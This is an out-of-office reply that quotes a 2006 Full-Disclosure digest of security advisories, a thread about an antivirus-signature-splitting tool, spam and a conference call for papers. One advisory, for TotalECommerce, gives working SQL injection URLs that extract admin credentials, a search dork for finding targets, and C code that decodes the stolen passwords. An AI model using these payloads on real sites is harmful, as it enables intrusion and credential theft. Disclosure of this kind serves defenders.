Date: Sun Mar 5 12:01:37 2006
From: DMCCOY at bbl-inc.com (DONNY MCCOY)
Subject: Re: Full-Disclosure Digest, Vol 13, Issue 8

I will be in Denver through Thursday and will return to Syracuse on Friday. I will check voicemail and e-mail periodically as time allows. If your e-mail is urgent, please contact the help desk in Syracuse at x19511.

Thanks.

Donny

>>> full-disclosure 03/05/06 07:00 >>>
Send Full-Disclosure mailing list submissions to
	full-disclosure@...ts.grok.org.uk

To subscribe or unsubscribe via the World Wide Web, visit
	https://lists.grok.org.uk/mailman/listinfo/full-disclosure
or, via email, send a message with subject or body 'help' to
	full-disclosure-request@...ts.grok.org.uk

You can reach the person managing the list at
	full-disclosure-owner@...ts.grok.org.uk

When replying, please edit your Subject line so it is more specific than "Re: Contents of Full-Disclosure digest..."

Note to digest recipients - when replying to digest posts, please trim your post appropriately. Thank you.

Today's Topics:

   1. Re: DSplit - Tiny AV signatures Detector (ad@...poverflow.com)
   2. Re: DSplit - Tiny AV signatures Detector (ad@...poverflow.com)
   3. Re: DSplit - Tiny AV signatures Detector (Alexander Hristov)
   4. [ GLSA 200603-01 ] WordPress: SQL injection vulnerability (Thierry Carrez)
   5. Advisory: TotalECommerce (index.asp id) Remote SQL Injection Vulnerability. (nukedx@...edx.com)
   6. [ GLSA 200603-02 ] teTeX, pTeX, CSTeX: Multiple overflows in included XPdf code (Thierry Carrez)
   7. [ GLSA 200603-03 ] MPlayer: Multiple integer overflows (Thierry Carrez)
   8. Please remove me from the list (W1nd man)
   9. Re: Please remove me from the list (Alexander Hristov)
  10. (no subject) (Steven Rakick)
  11. Re: (no subject) (Steven Rakick)
  12. Re: (no subject) (PERFECT.MATERIAL)
  13. HITBSecConf2006 - Malaysia: Call for Papers (Praburaajan)

----------------------------------------------------------------------

Message: 1
Date: Sat, 04 Mar 2006 13:09:57 +0100
From: "ad@...poverflow.com" <ad@...poverflow.com>
Subject: Re: [Full-disclosure] DSplit - Tiny AV signatures Detector
To: Alexander Hristov <joffer@...il.com>
Cc: Full Disclosure <full-disclosure@...ts.grok.org.uk>, bugtraq@...urityfocus.com
Message-ID: <44098395.6010604@...poverflow.com>
Content-Type: text/plain; charset=ISO-8859-1

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

yeah already knowing they are most fucking bastards

Alexander Hristov wrote:
> Clamav detects it and can unrar it with the unrar module
>
> On 3/3/06, ad@...poverflow.com <ad@...poverflow.com> wrote:
>> DSplit is the small brother of an old tool known as UKsplitter which is now
>> abandoned, does not work in vmware, fails to run under windows 2003.
>>
>> DSplit has been coded for persons like me, targeted by AV firms and
>> I'm not responsible for the bad uses of it, I recall this method has been
>> known for a long time and it's up to the AV firms to review their
>> detection software.
>>
>> http://heapoverflow.com/dem0s/Dsplit-patching_DFind_on_Symantec_Corporate.htm
>> http://getdsplit.class101.org
>>
>> usual critics, flames, can be directly sent to the Recycle Bin :>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
> --
> Best Regards,
> Aleksander Hristov < root at securitydot.net > < http://securitydot.net >

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (MingW32)

iQIVAwUBRAmDlK+LRXunxpxfAQLmag/8D32IgYedMC/LKtfLKeNv/Dafq9i2NTKu
Hsns+6DpLvC5QlOUWUixfok2Nici4lp5dy/xF8D01tqgh3gKFnmv2u0dqjxj6w4K
VeZC2teXcYndCWrMDCX+3HFcT4+ZUjkMjGixAwnQhAuIsstQ5pP9pfOT+3PrZFeE
Li8IUqFzUL+sUkMhNeZm51mPF69nHeGTRYY9mKKploXeczCpH33EGjeMoDynwKwp
VPESww9avNd9AiCQ+bvE9Eeh1+kihcJwwyFfWqd64E4C3L85Cr+GqQ+EzQMp/ZmW
Bq4ETGD5En02DnHo8+S152VisipIKgWZpzlzgTlFTkyuDnh+aS5VH1ZJGoiMhONo
mNrDe45a3G2r6t3NA/PRJLocKrnrsXeGw7EqQ52GJ9sWrBXT+yJ/CbAZ6yg0ToVU
7zB8ggAsuedNKPCG3LZH/w5eDErFlG+c9pDzrvUv4NxR1BDRfPMlsSYcAR7zq9tf
q/I1fZO43hT3nSyukT8NNB1vN7S7J6Zw2Djh6jEjyPwefEnbFmd3Au1zF+tR6qX1
mkScSpoMgbJKcFkk8U2ZAskx18qHvkalKjnjbqxctigQ2sTf4FLtJlCwF5ux6Rld
Ko5Bs/yIdHr8b0l7r+v1Ek53P/BqtU+3QUC5y3maDSpK81VRlx3mI1Z3IWrrsUuA
KMruj3WAFys=
=+V3s
-----END PGP SIGNATURE-----

------------------------------

Message: 2
Date: Sat, 04 Mar 2006 13:16:33 +0100
From: "ad@...poverflow.com" <ad@...poverflow.com>
Subject: Re: [Full-disclosure] DSplit - Tiny AV signatures Detector
To: Alexander Hristov <joffer@...il.com>
Cc: Full Disclosure <full-disclosure@...ts.grok.org.uk>, bugtraq@...urityfocus.com
Message-ID: <44098521.6010509@...poverflow.com>
Content-Type: text/plain; charset=ISO-8859-1

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

and it clearly shows clamav is a crap antivirus where the tools like
DSplit are a problem for them, and they will detect DSplit when they
can't find a better way to detect viruses.

Alexander Hristov wrote:
> Clamav detects it and can unrar it with the unrar module
>
> On 3/3/06, ad@...poverflow.com <ad@...poverflow.com> wrote:
>> DSplit is the small brother of an old tool known as UKsplitter which is now
>> abandoned, does not work in vmware, fails to run under windows 2003.
>>
>> DSplit has been coded for persons like me, targeted by AV firms and
>> I'm not responsible for the bad uses of it, I recall this method has been
>> known for a long time and it's up to the AV firms to review their
>> detection software.
>>
>> http://heapoverflow.com/dem0s/Dsplit-patching_DFind_on_Symantec_Corporate.htm
>> http://getdsplit.class101.org
>>
>> usual critics, flames, can be directly sent to the Recycle Bin :>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
> --
> Best Regards,
> Aleksander Hristov < root at securitydot.net > < http://securitydot.net >

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (MingW32)

iQIVAwUBRAmFIK+LRXunxpxfAQIfpw/+IRX6K3to4PGa9VDuJOyVjeOTofqLVAAX
OcS1q1ECyzgrHotFSb9VzLLZHOiiPxZeUEbOici+rjG3av5LyYYrrzFumcOzHzt0
gzC9xZLyy6kIzBUjF5RExNNdurNPJOzEWLNCHbcLPT0yPh3IOtuSVfDJjZIV4ESq
GRSeCtc0Hx6pGzamtnfUVzROma580CvV7SdpgWHpuopUdaIhzVjJOVtRwfXTaD2H
DFI7tnBuKdsnG6XpsbQIuBEzlaT2y0iPX22qAukdgcsdJ5+1MK/LcICCKJbHmd1m
uTCv/1arZEo+bc29lnMfqlyMSjNvlSe84/IA7trRZZZAnKpNULXtsrFKc8kMrGoG
59FBuUI7Mr+TEF5BB+gavxBSMZpe3hIMkggytXZTCt4jqfOCI/6OY9To5mPpkgac
2zoYVG7lDH90PTUgzoF0gcHPd4kbsxjiS2gSmRX050XnvT56i3IRZPE25cjA3iJx
9aLj41nmN3aHw2xAnIlbsXX9PkE5UZGL97ijifgfO7fW6Hf8TcdW3ZKIaFxM0+3h
TBHXPpWLSXTretDER46S+e4w4nt6aaqDkna84Bcdo9UkCDIt1gfKMD2IKTTcUMWb
rOBVh/YxBBrDayE7bkT/TEy697eTF3NZajCNDqyBqCKCQZOVCKICGPbYBUWI4kIH
RDdNjcudUuw=
=iAHW
-----END PGP SIGNATURE-----

------------------------------

Message: 3
Date: Sat, 4 Mar 2006 14:41:45 +0200
From: "Alexander Hristov" <joffer@...il.com>
Subject: Re: [Full-disclosure] DSplit - Tiny AV signatures Detector
To: "ad@...poverflow.com" <ad@...poverflow.com>
Cc: Full Disclosure <full-disclosure@...ts.grok.org.uk>, bugtraq@...urityfocus.com
Message-ID: <734063a30603040441v3beb90d5n7faab639859c8dd7@...l.gmail.com>
Content-Type: text/plain; charset=ISO-8859-1

Well clamav is the best AV for no money and it's very well developed, again for no money :)

On 3/4/06, ad@...poverflow.com <ad@...poverflow.com> wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> and it clearly shows clamav is a crap antivirus where the tools like
> DSplit are a problem for them,
> and they will detect DSplit when they can't find a better way to
> detect viruses.
>
>
>
> Alexander Hristov wrote:
> > Clamav detects it and can unrar it with the unrar module
> >
> > On 3/3/06, ad@...poverflow.com <ad@...poverflow.com> wrote:
> >> DSplit is the small brother of an old tool known as UKsplitter which is now
> >> abandoned, does not work in vmware, fails to run under windows 2003.
> >>
> >> DSplit has been coded for persons like me, targeted by AV firms and
> >> I'm not responsible for the bad uses of it, I recall this method has been
> >> known for a long time and it's up to the AV firms to review their
> >> detection software.
> >>
> >> http://heapoverflow.com/dem0s/Dsplit-patching_DFind_on_Symantec_Corporate.htm
> >> http://getdsplit.class101.org
> >>
> >> usual critics, flames, can be directly sent to the Recycle Bin :>
> >>
> >> _______________________________________________
> >> Full-Disclosure - We believe in it.
> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >> Hosted and sponsored by Secunia - http://secunia.com/
> >
> > --
> > Best Regards,
> > Aleksander Hristov < root at securitydot.net > < http://securitydot.net >
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.2 (MingW32)
>
> iQIVAwUBRAmFIK+LRXunxpxfAQIfpw/+IRX6K3to4PGa9VDuJOyVjeOTofqLVAAX
> OcS1q1ECyzgrHotFSb9VzLLZHOiiPxZeUEbOici+rjG3av5LyYYrrzFumcOzHzt0
> gzC9xZLyy6kIzBUjF5RExNNdurNPJOzEWLNCHbcLPT0yPh3IOtuSVfDJjZIV4ESq
> GRSeCtc0Hx6pGzamtnfUVzROma580CvV7SdpgWHpuopUdaIhzVjJOVtRwfXTaD2H
> DFI7tnBuKdsnG6XpsbQIuBEzlaT2y0iPX22qAukdgcsdJ5+1MK/LcICCKJbHmd1m
> uTCv/1arZEo+bc29lnMfqlyMSjNvlSe84/IA7trRZZZAnKpNULXtsrFKc8kMrGoG
> 59FBuUI7Mr+TEF5BB+gavxBSMZpe3hIMkggytXZTCt4jqfOCI/6OY9To5mPpkgac
> 2zoYVG7lDH90PTUgzoF0gcHPd4kbsxjiS2gSmRX050XnvT56i3IRZPE25cjA3iJx
> 9aLj41nmN3aHw2xAnIlbsXX9PkE5UZGL97ijifgfO7fW6Hf8TcdW3ZKIaFxM0+3h
> TBHXPpWLSXTretDER46S+e4w4nt6aaqDkna84Bcdo9UkCDIt1gfKMD2IKTTcUMWb
> rOBVh/YxBBrDayE7bkT/TEy697eTF3NZajCNDqyBqCKCQZOVCKICGPbYBUWI4kIH
> RDdNjcudUuw=
> =iAHW
> -----END PGP SIGNATURE-----
>

--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >

------------------------------

Message: 4
Date: Sat, 04 Mar 2006 16:45:31 +0100
From: Thierry Carrez <koon@...too.org>
Subject: [Full-disclosure] [ GLSA 200603-01 ] WordPress: SQL injection vulnerability
To: gentoo-announce@...ts.gentoo.org
Cc: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com, security-alerts@...uxsecurity.com
Message-ID: <4409B61B.5060903@...too.org>
Content-Type: text/plain; charset="iso-8859-1"

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200603-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: WordPress: SQL injection vulnerability
      Date: March 04, 2006
      Bugs: #121661
        ID: 200603-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

WordPress is vulnerable to an SQL injection vulnerability.

Background
==========

WordPress is a PHP and MySQL based content management and publishing
system.

Affected packages
=================

    -------------------------------------------------------------------
     Package               /  Vulnerable  /                  Unaffected
    -------------------------------------------------------------------
  1  www-apps/wordpress        <= 1.5.2                        >= 2.0.1

Description
===========

Patrik Karlsson reported that WordPress 1.5.2 makes use of an
insufficiently filtered User Agent string in SQL queries related to
comment posting. This vulnerability was already fixed in the 2.0 series
of WordPress.

Impact
======

An attacker could send a comment with a malicious User Agent parameter,
resulting in SQL injection and potentially in the subversion of the
WordPress database. This vulnerability wouldn't affect WordPress sites
which do not allow comments or which require that comments go through a
moderator.

Workaround
==========

Disable or moderate comments on your WordPress blogs.

Resolution
==========

All WordPress users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=www-apps/wordpress-2.0.1"

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200603-01.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@...too.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 256 bytes
Desc: OpenPGP digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060304/89aced5d/signature-0001.bin

------------------------------

Message: 5
Date: Sat, 04 Mar 2006 16:26:07 +0200
From: nukedx@...edx.com
Subject: [Full-disclosure] Advisory: TotalECommerce (index.asp id) Remote SQL Injection Vulnerability.
To: submit@...w0rm.com, full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
Message-ID: <20060304162607.2lyie75fm1m4gwow@...mail.nukedx.com>
Content-Type: text/plain; charset=ISO-8859-9

--Security Report--
Advisory: TotalECommerce (index.asp id) Remote SQL Injection Vulnerability.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 04/03/06 04:36 AM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx@...edx.com
Web: http://www.nukedx.com
}
---
Vendor: TotalECommerce (http://www.totalecommerce.com)
Version: 1.0 and prior versions must be affected.
About: Via this method a remote attacker can inject arbitrary SQL queries into the id parameter of index.asp
Level: Critical
---
How&Example:
GET -> http://[victim]/[dir]/index.asp?secao=[PageID]&id=[SQL]
EXAMPLE 1 -> http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+senha,senha,senha,senha,senha,senha,senha,
senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,
senha,senha,senha,senha,senha,senha,senha+from+administradores
EXAMPLE 2 -> http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+login,login,login,login,login,login,login,
login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,
login,login,login,login,login,login,login+from+administradores
With example 1 a remote attacker can get the admin's encrypted password and with example 2 a remote attacker can get the admin's login name.
[PageID]: must be a working page id; you can get some from the front page.
---
Timeline:
* 04/03/2006: Vulnerability found.
* 04/03/2006: Could not contact vendor.
* 04/03/2006: File closed.
---
Exploit&Decrypter: http://www.nukedx.com/?getxpl=18
---
Dorks: intext:"totalecommerce"
---
Original advisory: http://www.nukedx.com/?getxpl=18
---
Decrypter source in C
---

/*********************************************
 *      TotalECommerce PWD Decrypter         *
 *        Coded by |SaMaN| for nukedx        *
 *         http://www.k9world.org            *
 *           IRC.K9World.Org                 *
 * Advisory: http://www.nukedx.com/?viewdoc=18 *
 **********************************************/
#include <ctype.h>
#include <stdio.h>
#include <string.h>

int main(void)
{
    char buf[255];        /* stored ("crypted") password, as typed in */
    char buf2[255] = "";  /* decoded result; starts empty */
    size_t i, len;

    printf("|=------------------------------------=|\n");
    printf(" Coded by |SaMaN| @ IRC.K9World.Org\n");
    printf("|=------------------------------------=|\n\n");
    printf("Enter crypted password: ");
    if (scanf("%200s", buf) != 1)
        return 1;

    /* The scheme is a per-byte map: each byte becomes 255 - byte,
     * folded to 7-bit ASCII with toascii(). */
    len = strlen(buf);
    for (i = 0; i < len; i++) {
        int z = 255 - (unsigned char)buf[i];
        buf2[i] = (char)toascii(z);
    }
    buf2[len] = '\0';

    printf("Result: %s\n", buf2);
    return 0;
}

---End of code---
Greets to: |SaMaN|

------------------------------

Message: 6
Date: Sat, 04 Mar 2006 17:32:34 +0100
From: Thierry Carrez <koon@...too.org>
Subject: [Full-disclosure] [ GLSA 200603-02 ] teTeX, pTeX, CSTeX: Multiple overflows in included XPdf code
To: gentoo-announce@...ts.gentoo.org
Cc: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com, security-alerts@...uxsecurity.com
Message-ID: <4409C122.4090103@...too.org>
Content-Type: text/plain; charset="iso-8859-1"

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200603-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: teTeX, pTeX, CSTeX: Multiple overflows in included XPdf code
      Date: March 04, 2006
      Bugs: #115775
        ID: 200603-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

CSTeTeX, pTeX, and teTeX include vulnerable XPdf code to handle PDF
files, making them vulnerable to the execution of arbitrary code.

Background
==========

teTeX is a complete TeX distribution. It is used for creating and
manipulating LaTeX documents. CSTeX is a TeX distribution with Czech
and Slovak support. pTeX is an ASCII publishing TeX distribution.

Affected packages
=================

    -------------------------------------------------------------------
     Package               /  Vulnerable  /                  Unaffected
    -------------------------------------------------------------------
  1  app-text/tetex            < 2.0.2-r8                    >= 2.0.2-r8
  2  app-text/cstetex          < 2.0.2-r2                    >= 2.0.2-r2
  3  app-text/ptex             < 3.1.5-r1                    >= 3.1.5-r1
    -------------------------------------------------------------------
     3 affected packages on all of their supported architectures.
    -------------------------------------------------------------------

Description
===========

CSTeX, teTeX, and pTeX include XPdf code to handle PDF files. This XPdf
code is vulnerable to several heap overflows (GLSA 200512-08) as well
as several buffer and integer overflows discovered by Chris Evans
(CESA-2005-003).

Impact
======

An attacker could entice a user to open a specially crafted PDF file
with teTeX, pTeX or CSTeX, potentially resulting in the execution of
arbitrary code with the rights of the user running the affected
application.

Workaround
==========

There is no known workaround at this time.
Resolution
==========

All teTeX users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-text/tetex-2.0.2-r8"

All CSTeX users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-text/cstetex-2.0.2-r2"

All pTeX users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-text/ptex-3.1.5-r1"

References
==========

  [ 1 ] CVE-2005-3193
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-3193
  [ 2 ] GLSA 200512-08
        http://www.gentoo.org/security/en/glsa/glsa-200512-08.xml
  [ 3 ] CESA-2005-003
        http://scary.beasts.org/security/CESA-2005-003.txt

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200603-02.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@...too.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 256 bytes
Desc: OpenPGP digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060304/5e29724b/signature-0001.bin

------------------------------

Message: 7
Date: Sat, 04 Mar 2006 18:26:18 +0100
From: Thierry Carrez <koon@...too.org>
Subject: [Full-disclosure] [ GLSA 200603-03 ] MPlayer: Multiple integer overflows
To: gentoo-announce@...ts.gentoo.org
Cc: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com, security-alerts@...uxsecurity.com
Message-ID: <4409CDBA.8060405@...too.org>
Content-Type: text/plain; charset="iso-8859-1"

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200603-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: MPlayer: Multiple integer overflows
      Date: March 04, 2006
      Bugs: #115760, #122029
        ID: 200603-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

MPlayer is vulnerable to integer overflows in FFmpeg and ASF decoding
that could potentially result in the execution of arbitrary code.

Background
==========

MPlayer is a media player capable of handling multiple multimedia file
formats.

Affected packages
=================

    -------------------------------------------------------------------
     Package               /  Vulnerable  /                  Unaffected
    -------------------------------------------------------------------
  1  media-video/mplayer      < 1.0.20060217              >= 1.0.20060217

Description
===========

MPlayer makes use of the FFmpeg library, which is vulnerable to a heap
overflow in the avcodec_default_get_buffer() function discovered by
Simon Kilvington (see GLSA 200601-06). Furthermore, AFI Security
Research discovered two integer overflows in ASF file format decoding,
in the new_demux_packet() function from libmpdemux/demuxer.h and the
demux_asf_read_packet() function from libmpdemux/demux_asf.c.

Impact
======

An attacker could craft a malicious media file which, when opened using
MPlayer, would lead to a heap-based buffer overflow. This could result
in the execution of arbitrary code with the permissions of the user
running MPlayer.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All MPlayer users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=media-video/mplayer-1.0.20060217"

References
==========

  [ 1 ] CVE-2005-4048
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4048
  [ 2 ] CVE-2006-0579
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0579
  [ 3 ] GLSA 200601-06
        http://www.gentoo.org/security/en/glsa/glsa-200601-06.xml

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200603-03.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@...too.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 256 bytes
Desc: OpenPGP digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060304/568fbea3/signature-0001.bin

------------------------------

Message: 8
Date: Sat, 4 Mar 2006 22:16:10 +0200
From: W1nd man <w1ndm4n@...la.com>
Subject: [Full-disclosure] Please remove me from the list
To: <full-disclosure@...ts.grok.org.uk>
Message-ID: <1141503369.961000-13997465-23441@...la.com>
Content-Type: text/plain; charset="us-ascii"

An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060304/f69d9753/attachment-0001.html

------------------------------

Message: 9
Date: Sun, 5 Mar 2006 03:52:28 +0200
From: "Alexander Hristov" <joffer@...il.com>
Subject: Re: [Full-disclosure] Please remove me from the list
To: "W1nd man" <w1ndm4n@...la.com>
Cc: full-disclosure@...ts.grok.org.uk
Message-ID: <734063a30603041752v7a8cc6efnd28861cae0f8be32@...l.gmail.com>
Content-Type: text/plain; charset=ISO-8859-1

U can remove yourself from here: https://lists.grok.org.uk/mailman/listinfo/full-disclosure

On 3/4/06, W1nd man <w1ndm4n@...la.com> wrote:
>
> Please remove me from the list
>
> ________________________________
>
> Walla! Mail - get your free 3G mail today
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >

------------------------------

Message: 10
Date: Sat, 4 Mar 2006 18:01:51 -0800
From: Steven Rakick <stevenrakick@...oo.com>
Subject: [Full-disclosure] (no subject)
To: full-disclosure@...ts.grok.org.uk
Message-ID: <1e7e8bed62fc8c339e776bd2ef170a59@....c0replay.net>
Content-Type: text/plain; charset="iso-8859-1"

Hello HACKERZ!,

Your personal DONGEZ to this message.

Sincerely,
BanHaus manager

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060304/f1416faf/attachment-0001.html

------------------------------

Message: 11
Date: Sat, 4 Mar 2006 20:28:32 -0800 (PST)
From: Steven Rakick <stevenrakick@...oo.com>
Subject: Re: [Full-disclosure] (no subject)
To: full-disclosure@...ts.grok.org.uk
Message-ID: <20060305042832.34191.qmail@...53201.mail.yahoo.com>
Content-Type: text/plain; charset=iso-8859-1

Not that it matters but...

Received: from www.c0replay.net (unknown [206.251.72.74])
	by lists.grok.org.uk (Postfix) with ESMTP id 739EF127
	for <full-disclosure@...ts.grok.org.uk>;
	Sun, 5 Mar 2006 02:02:03 +0000 (GMT)
Date: Sat, 4 Mar 2006 18:01:51 -0800
To: full-disclosure@...ts.grok.org.uk
From: Steven Rakick <stevenrakick@...oo.com>
Message-ID: <1e7e8bed62fc8c339e776bd2ef170a59@....c0replay.net>
X-Priority: 3
X-Mailer: PHPMailer [version 1.73]

__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com

------------------------------

Message: 12
Date: Sun, 5 Mar 2006 00:34:03 -0500
From: PERFECT.MATERIAL <perfect.material@...il.com>
Subject: Re: [Full-disclosure] (no subject)
To: "Steven Rakick" <stevenrakick@...oo.com>
Cc: full-disclosure@...ts.grok.org.uk
Message-ID: <631ac1d90603042134n7a22e7aale14d2aa7914dda58@...l.gmail.com>
Content-Type: text/plain; charset="iso-8859-1"

Dick Breath,

You should sign your electronic mail with some unhackable crypto
technology. That way you will never need to show off your cut and paste
technology to the others. You are irresponsible.

Not that it matters but...

PERFECT.MATERIAL

On 3/4/06, Steven Rakick <stevenrakick@...oo.com> wrote:
>
> Not that it matters but...
>
> Received: from www.c0replay.net (unknown
> [206.251.72.74])
> by lists.grok.org.uk (Postfix) with ESMTP id 739EF127
> for <full-disclosure@...ts.grok.org.uk>;
> Sun, 5 Mar 2006 02:02:03 +0000 (GMT)
> Date: Sat, 4 Mar 2006 18:01:51 -0800
> To: full-disclosure@...ts.grok.org.uk
> From: Steven Rakick <stevenrakick@...oo.com>
> Message-ID:
> <1e7e8bed62fc8c339e776bd2ef170a59@....c0replay.net>
> X-Priority: 3
> X-Mailer: PHPMailer [version 1.73]
>
>
> __________________________________________________
> Do You Yahoo!?
> Tired of spam? Yahoo! Mail has the best spam protection around
> http://mail.yahoo.com
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060305/d547fd1e/attachment-0001.html

------------------------------

Message: 13
Date: Sun, 05 Mar 2006 13:34:43 +0800
From: Praburaajan <prabu@...kinthebox.org>
Subject: [Full-disclosure] HITBSecConf2006 - Malaysia: Call for Papers
To: full-disclosure@...ts.grok.org.uk, dailydave@...ts.immunitysec.com, pen-test@...urityfocus.com, bugtraq@...urityfocus.com, Voipsec@...psa.org, submit@...w0rm.com, webappsec@...urityfocus.com, ipv6@...f.org, security-basics@...urityfocus.com
Message-ID: <440A7873.4000202@...kinthebox.org>
Content-Type: text/plain; charset=windows-1252; format=flowed

Greetings from Hack in The Box --

We are pleased to announce that the Call for Papers (CfP) for
HITBSecConf2006 - Malaysia is now open! Set to take place from
September 18th - 21st 2006 at The Westin Kuala Lumpur, this year's
conference promises to once again deliver an international
deep-knowledge security conference.
HITBSecConf has been described as "the most intimate of hacker
gatherings" and is the largest network security conference in Asia!

SUBMISSION

HITBSecConf is a deep-knowledge technical conference. Talks that are
more technical or that discuss new and never before seen attack methods
are of more interest than a subject that has been covered several times
before. Summaries not exceeding 250 words should be submitted (in plain
text format) to cfp -at- hackinthebox.org for review and possible
inclusion in the programme.

Submissions are due no later than 1st of May 2006

TOPICS

Topics of interest include, but are not limited to the following:

* Analysis of network and security vulnerabilities
* Firewall technologies
* Intrusion detection
* Data Recovery and Incident Response
* GPRS, 3G and CDMA Security
* Identification and Entity Authentication
* Network Protocol and Analysis
* Smart Card Security
* Virus and Worms
* WLAN and Bluetooth Security
* Analysis of malicious code
* Applications of cryptographic techniques
* Analysis of attacks against networks and machines
* Denial-of-service attacks and countermeasures
* File system security
* Security in heterogeneous and large-scale environments
* Techniques for developing secure systems

PLEASE NOTE: We do not accept product or vendor related pitches. If
your talk involves an advertisement for a new product or service your
company is offering, please do not submit.

Your submission should include:

* Name, title, address, email and phone/contact number
* Draft of the proposed presentation (in PDF or PowerPoint format),
  proof of concept for tools and exploits, etc.
* Short biography, qualification, occupation, achievement and
  affiliations (limit 150 words).
* Summary or abstract for your presentation (limit 250 words)
